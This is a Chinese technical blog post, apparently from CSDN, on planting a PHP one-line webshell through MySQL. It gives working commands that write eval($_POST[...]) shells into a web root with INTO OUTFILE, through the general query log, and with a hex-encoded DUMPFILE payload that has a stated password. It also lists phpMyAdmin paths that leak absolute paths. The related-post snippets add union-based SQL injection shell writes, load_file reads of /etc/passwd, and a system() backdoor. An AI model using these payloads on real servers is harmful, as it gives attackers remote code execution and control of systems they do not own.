linux mysql写入一句话,mysql 写入一句话

于 2021-05-12 05:06:48 发布
阅读量264 收藏
点赞数
文章标签: linux mysql写入一句话

mysql 写入一句话

方法一:

1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启     如果:  secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv =  ,没有的话添加上         如果为一个目录,如:secure_file_priv = /home 那就只能导出到指定的目录,子目录也不行         如果为为空,如 secure_file_priv = ,说明可以导出到任意位置,注意等号一定要有 2、写入:     select '<?php eval($_POST[kill]);?>' into outfile 'E:/phpStudy/PHPTutorial/WWW/kill1.php'; 导出的木马文件一定要在可执行的目录下,如果有phpinfo.php文件,可以确认一下;

方法二:

如果可以进入PHPmyadmin,但是无法导出文件,这时,可以进入变量, 搜索 general logOFF --这个默认是off,关闭的,把它打开 general log file --设置日志文件及位置 然后执行查询 select "<?php eval($_POST['hacker']);?>" 就可以连接日志文件了

补充:还可以直接用dumpfile来得到shell

select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';

加密部分为 lanker 一句话 密码为 cmd

phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -

http://target/phpmyadmin/libraries/string.lib.php  http://target/phpmyadmin/libraries/string.lib.php  http://target/phpmyadmin/libraries/database_interface.lib.php http://target/phpmyadmin/libraries/db_table_exists.lib.php  http://target/phpmyadmin/libraries/display_export.lib.php http://target/phpmyadmin/libraries/header_meta_style.inc.php http://target/phpmyadmin/libraries/mcrypt.lib.php

weixin_39947908
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql写一句代码_mysql 写入一句
weixin_39932479的博客
01-18 519
mysql 写入一句方法一:1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启 如果:secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的添加上 如果为一个目录,如:s...
mysql写入一句的方式
孤的博客
09-30 1232
一、union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 1’ union select 1,2,’<?php @eval($_POST[cmd]);?>’ into outfile “C:\phpStudy\PHPTutorial\WWW\shell.php” --+ 1’ union select 1,2,’<?p...
针对MYSQL数据注入时用到的 load_file()函数
dibodang1423的博客
05-16 255
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)...
MYSQL写入一句的方式
孤的博客
09-13 1395
一、union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\shell.php" --+ 1' union select 1,2,'&l...
Java实现批量向mysql写入数据的方法
08-28
本文中提供了一个完整的示例代码,演示了Java实现批量向mysql写入数据的方法,包括JDBC连接mysql数据库、批量向mysql写入数据和基本的异常处理等操作。该示例代码可以作为Java程序设计的参考,帮助读者更好地理解...
MYSQL语句写入.zip_MYSQL语句写入
09-21
通过实践和理解这个示例,开发者能够掌握如何在实际项目中有效地将数据写入MySQL数据库。 总之,MySQL写入操作是数据库管理的基础,熟练掌握各种写入语句对于任何涉及数据库开发的项目都至关重要。这个压缩包提供...
linux 环境 mysql写入中文报错
09-15
本篇文章主要介绍了linux 环境 mysql写入中文报错的相关知识。具有很好的参考价值。下面跟着小编一起来看下吧
c#简单实现mysql连接和文件的写入写出
05-27
接下来,我们将创建一个简单的C#应用程序,用于连接到MySQL服务器并执行基本的CRUD(创建、读取、更新、删除)操作。以下是连接MySQL的基本步骤: 1. **连接配置**:定义数据库连接字符串,包括服务器地址、用户名...
python测试mysql写入性能完整实例
09-09
最后,对于从txt文件读取数据并写入MySQL的情况,可以先将文本数据批量加载到内存,然后按照上述批量写入或事务加批量写入的方式进行操作。这样可以避免频繁的磁盘I/O操作,提高整体处理速度。 总的来说,Python...
MySQL导出一句拿WebShell的方法
06-19
MySQL导出一句拿WebShell的方法
MYSQL快速写入一句拿权限技巧
KHOST的博客
01-31 763
必须条件: root权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,写文件必须) 没有配置–secure-file-priv id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’# <? phpinfo()...
mysql注入写一句_MySQL手工注入步骤+直接写入一句
weixin_29227585的博客
01-19 2723
(1)判断注入点 接着通过and 1=1 和 and 1=2测试发现前者正常,后者异常,可以肯定存在注入点,接下来判断该页面查询数据库的字段(2)查询字段数http://unisscan.cn/list.php?lei=246 order by n--结果发现有31个字段 (3)看看哪些字段可以显示信息http://unisscan.cn/list.php?lei=246 and 1=2 uni...
mysql写入一句木马
热门推荐
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
MySQL 写一句拿 WebShell
ShadowySpirits的博客
10-03 5105
本文介绍两种利用 MySQL getshell 的方法: select … into outfile general_log 一、select … into outfile 介绍 利用需要满足以下条件: 对web目录有写权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,写文件必须) 没有配置 –secure-file-priv 姿势: 有 union id=2) union...
通过mysql 插入一句***
weixin_34061042的博客
05-19 191
USEtest;# MySQL 返回的查询结果为空(即零行)。DROPTABLEIFEXISTStemp;# MySQL 返回的查询结果为空(即零行)。CREATETABLEtemp(cmdTEXTNOTNULL);# MySQL 返回的查询结果为空(即零行)。INSERTINTOtemp(cmd)VALUES('<?php @eval($_POST['pass']);...
php mysql语句一句,MYSQL经典语句大全——开发篇
weixin_27565831的博客
03-23 153
MYSQL经典语句大全——开发篇黄舟2016-12-20 16:36:10原创5611.按姓氏笔画排序:Select * From TableName Order By CustomerName Collate Chinese_PRC_Stroke_ci_as //从少到多2.数据库加密:select encrypt('原始密码')select pwdencrypt('原始密码')select p...
一句木马写入以及通过sql进行服务器的远程控制
weixin_44720762的博客
04-21 1890
在开始之前我想先在这里提醒选择阅读这篇博客的读者。因为本人初涉安全领域知识。关于sql盲注尚处于学习和摸索状态,存在对些许知识点和概念理解尚不清晰甚至是完全偏差的问题。此博客亦是只起到对现所学知识的一个记录。所以只起到一个借鉴的作用,并不建议读者用作专业知识学习。 在演示通过sql进行服务器的远程控制之前,必须首先清除两个基本的概念,也就是一句木马以及如何通过into_outfile写入代码并控...
mysql创建木马_Mysql的语句生成后门木马的方法
weixin_39835607的博客
02-18 116
咳咳,大家看看就好了,本人不负责所产生的后果代码如下:SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.p...
mysql写入一段数据
最新发布
02-15
如果想在 MySQL写入一段数据,你可以使用 SQL 语句 `INSERT`。 例如,如果你有一个名为 "users" 的表,其中有 "id", "name", "email" 和 "age" 四个字段,你可以使用以下语句来插入一条数据: ``` INSERT INTO ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值